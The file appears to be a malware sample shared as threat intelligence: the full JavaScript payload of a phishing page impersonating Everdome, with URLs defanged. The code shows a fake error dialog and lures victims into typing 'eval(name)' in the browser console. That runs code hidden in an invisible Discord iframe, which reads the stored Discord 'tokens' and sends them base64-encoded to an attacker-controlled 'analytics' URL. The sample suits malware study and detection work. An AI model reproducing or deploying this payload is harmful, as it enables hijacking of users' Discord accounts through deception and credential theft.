Everdome impersonation - payload - https://twitter.com/Jon_HQ/status/1572902872110755843

everdome_impersonation_payload.js

var css = document.createElement('link')
css.setAttribute(
  'href',
  'hxxps://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css'
)
css.setAttribute('rel', 'stylesheet')
document.head.appendChild(css)
var js = document.createElement('script')
js.setAttribute(
  'src',
  'hxxps://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'
)
document.body.appendChild(js)
var jq = document.createElement('script')
jq.setAttribute('src', 'hxxps://code.jquery.com/jquery-3.6.0.min.js')
document.head.appendChild(jq)
var button = document.createElement('button')
button.setAttribute('type', 'button')
button.setAttribute('class', 'btn btn-primary')
button.setAttribute('data-bs-toggle', 'modal')
button.setAttribute('data-bs-target', '#exampleModal')
button.setAttribute('id', 'trigger')
button.setAttribute('style', 'opacity: 0')
button.innerText = 'Test'
document.body.appendChild(button)
var div = document.createElement('div')
div.innerHTML =
  '\n    <div class="modal fade" id="exampleModal" tabindex="-1" data-bs-backdrop="static" data-bs-keyboard="false">\n        <div class="modal-dialog modal-dialog-centered">\n            <div class="modal-content">\n                <div class="modal-header">\n                    <h5 class="modal-title">An unexpected error has occurred...</h5>\n                </div>\n                <div class="modal-body">\n                    <p>Please follow the instructions below so we may assist you.</p>\n                    <ol>\n                        <li>Right-click anywhere on the page and choose <b>inspect</b></li>\n                        <li>Navigate to the <b>console</b> tab and follow the instructions there to retrieve your debug ID</li>\n                    </ol>\n                    <div class="input-group mb-3">\n                        <input type="text" class="form-control" placeholder="Debug ID" aria-label="Debug ID" aria-describedby="button-addon" id="debug-id">\n                        <button class="btn btn-outline-primary" type="button" id="button-addon">Send</button>\n                    </div>\n                    <img src="hxxps://everdome[.]gg/error.gif" width="470" height="250">\n                </div>\n                <div class="modal-footer justify-content-start">\n                    <small>Ref-id: 682db637-0f31-4847-9cdf-25ba9613a75c</small>\n                </div>\n            </div>\n        </div>\n    </div>\n'
document.body.appendChild(div)
window.onmessage = (_0x48384d) => {
  var _0x4c9fb2 = document.createElement('img')
  _0x4c9fb2.src = 'hxxps://everdome[.]gg/analytics_t?t=' + btoa(_0x48384d.data)
  document.body.appendChild(_0x4c9fb2)
}
setTimeout(() => {
  $('#trigger').click()
  window.iframe = document.createElement('iframe')
  window.iframe.src = 'hxxps://discord.com/robots.txt'
  window.iframe.style =
    '\n        opacity: 0;\n        position:fixed;\n        top:0;\n        left:0;\n        bottom:0;\n        right:0;\n        width:100%;\n        height:100%;\n        border:none;\n        margin:0;\n        padding:0;\n        overflow:hidden;\n        z-index:999999;\n    '
  window.iframe.name =
    '                                                                                                      const o = window.document.createElement("iframe");window.document.head.append(o);var e = Object.getOwnPropertyDescriptor(o.contentWindow, "localStorage");o.remove(), Object.defineProperty(window, "localStorage", e);const tokens = localStorage.getItem("tokens");console.clear();console.log("Debug ID: "+Math.random().toString(36).slice(2, 10));parent.postMessage(tokens,"*");'
  document.body.appendChild(window.iframe)
  console.log(
    '%cTo retrieve your debug ID, please enter %ceval(name)%c in the field below',
    'font-size: 24px;',
    'font-size: 24px; background-color: blue;',
    'font-size: 24px;'
  )
  history.pushState({}, '', '/onboarding#error')
}, 1500)